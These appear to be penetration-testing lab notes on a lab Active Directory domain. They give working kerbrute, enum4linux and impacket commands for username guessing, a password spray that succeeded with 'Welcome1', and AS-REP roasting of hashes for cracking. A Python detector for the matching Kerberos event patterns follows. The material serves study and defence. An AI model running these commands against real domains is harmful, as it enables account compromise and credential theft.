Lab Notes

  • Guess names of valid accounts from statistically likely usernames

    • produce a custom list from the base lists, as no existing wordlist matched the username format used by the environment

    • kerbrute_linux_amd64 userenum --dc 192.168.1.200 -d acme.local ./statistically-likely-usernames/john_smith.txt

  • Perform password spray across all discovered usernames with "Welcome1"

    • kerbrute_linux_amd64 passwordspray -d acme.local --dc 192.168.1.200 valid_usernames.txt Welcome1

    • password spray was successful for user chris_nelson

  • Get list of all domain users

    • enum4linux -U -u chris_nelson -p Welcome1 192.168.1.200

  • Get list of AS-REP roastable users and their hashes for cracking

    • python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py -usersfile all_usernames.txt -request -format hashcat -outputfile ASREP_roastable_users_hashes.txt -dc-ip 192.168.1.200 'ACME/'
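
Detection side of the steps above, as an added example that is not part of the original notes: a Python detector for the three Kerberos patterns these steps leave in a domain controller's Security log. Those are 4768 failures with result code 0x6 for many names from one source (username guessing), 4771 failures with code 0x18 across many accounts from one source (password spray), and 4768 successes with pre-authentication type 0 (AS-REP roastable account). The record layout, field names, thresholds and sample events are assumptions constructed for illustration.

```python
from collections import defaultdict

# Constructed sample records (not from the lab): a simplified subset of fields from
# Security events 4768 (TGT requested) and 4771 (Kerberos pre-authentication failed).
SAMPLE_EVENTS = [
    {"t": 0,   "id": 4768, "ip": "10.0.0.50", "user": "alice_adams", "status": "0x6",  "preauth": "-"},
    {"t": 1,   "id": 4768, "ip": "10.0.0.50", "user": "bob_baker",   "status": "0x6",  "preauth": "-"},
    {"t": 2,   "id": 4768, "ip": "10.0.0.50", "user": "carl_cole",   "status": "0x6",  "preauth": "-"},
    {"t": 60,  "id": 4771, "ip": "10.0.0.50", "user": "dana_dunn",   "status": "0x18", "preauth": "2"},
    {"t": 61,  "id": 4771, "ip": "10.0.0.50", "user": "eric_ellis",  "status": "0x18", "preauth": "2"},
    {"t": 62,  "id": 4771, "ip": "10.0.0.50", "user": "fay_ford",    "status": "0x18", "preauth": "2"},
    {"t": 120, "id": 4768, "ip": "10.0.0.50", "user": "svc_backup",  "status": "0x0",  "preauth": "0"},
    # Benign traffic: a normal logon and one user mistyping a password twice.
    {"t": 130, "id": 4768, "ip": "10.0.0.77", "user": "dana_dunn",   "status": "0x0",  "preauth": "2"},
    {"t": 140, "id": 4771, "ip": "10.0.0.77", "user": "gina_gray",   "status": "0x18", "preauth": "2"},
    {"t": 150, "id": 4771, "ip": "10.0.0.77", "user": "gina_gray",   "status": "0x18", "preauth": "2"},
]

def detect_kerberos_abuse(events, window=300, threshold=3):
    """Return a sorted list of (finding, source IP or account) tuples."""
    unknown = defaultdict(set)  # (ip, time bucket) -> names the KDC did not recognise
    failed = defaultdict(set)   # (ip, time bucket) -> accounts with a failed pre-auth
    findings = set()
    for e in events:
        bucket = (e["ip"], e["t"] // window)  # fixed buckets of `window` seconds
        if e["id"] == 4768 and e["status"] == "0x6":     # KDC_ERR_C_PRINCIPAL_UNKNOWN
            unknown[bucket].add(e["user"].lower())
            if len(unknown[bucket]) >= threshold:
                findings.add(("username_enumeration", e["ip"]))
        elif e["id"] == 4771 and e["status"] == "0x18":  # KDC_ERR_PREAUTH_FAILED
            failed[bucket].add(e["user"].lower())        # distinct accounts, not retries
            if len(failed[bucket]) >= threshold:
                findings.add(("password_spray", e["ip"]))
        elif e["id"] == 4768 and e["status"] == "0x0" and e["preauth"] == "0":
            # TGT issued without pre-authentication: the account is AS-REP roastable.
            findings.add(("tgt_without_preauth", e["user"].lower()))
    return sorted(findings)

if __name__ == "__main__":
    for finding in detect_kerberos_abuse(SAMPLE_EVENTS):
        print(finding)
```

Counting distinct account names per source, rather than raw failures, keeps a single user retrying a wrong password from triggering the spray rule.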
